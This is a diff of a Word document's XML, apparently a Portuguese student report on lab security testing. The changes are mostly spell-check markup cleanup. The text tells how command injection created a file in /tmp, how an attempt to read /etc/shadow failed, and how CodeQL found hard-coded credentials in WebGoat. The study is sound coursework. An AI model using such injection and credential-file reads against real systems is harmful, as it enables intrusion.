         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47AA9B26" wp14:editId="65E10B80">
             <wp:extent cx="3098800" cy="869678"/>
@@ -3493,7 +3389,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> - Execução do comando </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3501,7 +3396,6 @@
         </w:rPr>
         <w:t>touch</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3516,7 +3410,6 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:tab/>
       </w:r>
       <w:r>
@@ -3533,7 +3426,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> enunciado do docente (alínea 2b), experimentou-se então criar um ficheiro na pasta </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3541,17 +3433,7 @@
           <w:iCs/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t>tmp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">tmp </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3716,7 +3598,6 @@
         <w:tab/>
         <w:t xml:space="preserve">Na figura 5, podemos confirmar, dentro do contentor, que o novo ficheiro “NOVAPASTAAQUI” foi criado na pasta </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3726,7 +3607,6 @@
         </w:rPr>
         <w:t>tmp</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3778,41 +3658,8 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve"> é possível obter o conteúdo do ficheiro /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>etc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>shadow</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> do servidor. Após testes, concluiu-se que não é possível, porque este ficheiro só pode ser por utilizadores com permissões adequadas, neste caso, o utilizador </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t xml:space="preserve"> é possível obter o conteúdo do ficheiro /etc/shadow do servidor. Após testes, concluiu-se que não é possível, porque este ficheiro só pode ser por utilizadores com permissões adequadas, neste caso, o utilizador </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3822,7 +3669,6 @@
         </w:rPr>
         <w:t>root</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3884,7 +3730,6 @@
         </w:rPr>
         <w:t xml:space="preserve">poderia ser usado para a mesma vulnerabilidade porque o resultado da </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3894,7 +3739,6 @@
         </w:rPr>
         <w:t>query</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3940,7 +3784,6 @@
         </w:rPr>
         <w:t xml:space="preserve">Após alguns testes parece não ser possível (testado no </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3957,7 +3800,6 @@
         </w:rPr>
         <w:t>Brave</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3974,7 +3816,6 @@
         </w:rPr>
         <w:t xml:space="preserve">mas a maneira como o browser codifica a </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3984,7 +3825,6 @@
         </w:rPr>
         <w:t>string</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4006,7 +3846,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> enviados na </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4016,7 +3855,6 @@
         </w:rPr>
         <w:t>string</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4037,7 +3875,7 @@
           <w:lang w:val="pt-PT"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="5" w:name="_Toc213009132"/>
+      <w:bookmarkStart w:id="5" w:name="_Toc213030673"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4050,23 +3888,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve"> – </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>CodeQL</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> e ZAP Proxy</w:t>
+        <w:t xml:space="preserve"> – CodeQL e ZAP Proxy</w:t>
       </w:r>
       <w:bookmarkEnd w:id="5"/>
     </w:p>
@@ -4082,29 +3904,13 @@
           <w:lang w:val="pt-PT"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="6" w:name="_Toc213009133"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">A – </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>CodeQL</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> execução local</w:t>
+      <w:bookmarkStart w:id="6" w:name="_Toc213030674"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>A – CodeQL execução local</w:t>
       </w:r>
       <w:bookmarkEnd w:id="6"/>
     </w:p>
@@ -4120,8 +3926,7 @@
           <w:lang w:val="pt-PT"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="7" w:name="_Toc213009134"/>
-      <w:proofErr w:type="spellStart"/>
+      <w:bookmarkStart w:id="7" w:name="_Toc213030675"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4130,7 +3935,6 @@
         <w:t>CodeQL</w:t>
       </w:r>
       <w:bookmarkEnd w:id="7"/>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4141,23 +3945,13 @@
           <w:lang w:val="pt-PT"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>CodeQL</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> é uma ferramenta de analise de código criada pela empresa </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">CodeQL é uma ferramenta de analise de código criada pela empresa </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4167,7 +3961,6 @@
         </w:rPr>
         <w:t>Semmle</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4189,25 +3982,16 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve">). Esta ferramenta permite analisar código com o objetivo de encontrar vulnerabilidades. O </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>CodeQL</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> vê o código a ser analisado como uma base dados, permitindo assim ao utilizador procurar por vulnerabilidade através de </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t xml:space="preserve">). Esta ferramenta permite analisar código com o objetivo de encontrar vulnerabilidades. O CodeQL vê o código a ser analisado como uma base dados, permitindo assim </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">ao utilizador procurar por vulnerabilidade através de </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4217,7 +4001,6 @@
         </w:rPr>
         <w:t>queries</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4238,24 +4021,15 @@
           <w:lang w:val="pt-PT"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="8" w:name="_Toc213009135"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Utilização do </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>CodeQL</w:t>
+      <w:bookmarkStart w:id="8" w:name="_Toc213030676"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>Utilização do CodeQL</w:t>
       </w:r>
       <w:bookmarkEnd w:id="8"/>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4273,7 +4047,6 @@
         </w:rPr>
         <w:t xml:space="preserve">Depois de realizar o </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4283,31 +4056,13 @@
         </w:rPr>
         <w:t>setup</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> necessário para utilizar o </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>CodeQL</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (A.1.a-c) e clonar e iniciar os repositórios que serão analisados usando esta </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> necessário para utilizar o CodeQL (A.1.a-c) e clonar e iniciar os repositórios que serão analisados usando esta </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4317,7 +4072,6 @@
         </w:rPr>
         <w:t>tool</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4325,7 +4079,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> (A.1.d-e, A.2 e A.3), segundo o enunciado do trabalho, questionou-se o código fonte da aplicação </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4335,7 +4088,6 @@
         </w:rPr>
         <w:t>WebGoat</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4350,9 +4102,46 @@
           <w:iCs/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve">Use </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t xml:space="preserve">Use of Hard-coded Credentials – </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>CWE 798</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (A.4)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Para tal utilizou-se a QL </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4360,9 +4149,15 @@
           <w:iCs/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t>of</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>query</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> já construída no repositório </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4370,9 +4165,15 @@
           <w:iCs/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve"> Hard-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>starter kit</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, HardcodedPasswordField.ql (A.4.a). O resultado desta </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4380,149 +4181,8 @@
           <w:iCs/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t>coded</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>Credentials</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> – </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>CWE 798</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (A.4)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="360"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">Para tal utilizou-se a QL </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
         <w:t>query</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> já construída no repositório </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>starter</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> kit</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>HardcodedPasswordField.ql</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (A.4.a). O resultado desta </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>query</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4669,7 +4329,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> - Resultado da QL </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4677,7 +4336,6 @@
         </w:rPr>
         <w:t>query</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4685,19 +4343,8 @@
           <w:iCs w:val="0"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i w:val="0"/>
-          <w:iCs w:val="0"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>HardcodedPasswordField.ql</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve"> HardcodedPasswordField.ql</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4714,7 +4361,6 @@
         </w:rPr>
         <w:t xml:space="preserve">Na figura 6 encontra-se o resultado da QL </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4724,7 +4370,6 @@
         </w:rPr>
         <w:t>query</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4732,7 +4377,6 @@
         </w:rPr>
         <w:t xml:space="preserve">. É possível observar uma lista onde se encontram identificadas </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4742,7 +4386,6 @@
         </w:rPr>
         <w:t>hardcoded</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4766,7 +4409,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> presentes no código fonte da aplicação </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4776,7 +4418,6 @@
         </w:rPr>
         <w:t>WebGoat</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4797,7 +4438,7 @@
           <w:lang w:val="pt-PT"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="9" w:name="_Toc213009136"/>
+      <w:bookmarkStart w:id="9" w:name="_Toc213030677"/>
       <w:r>
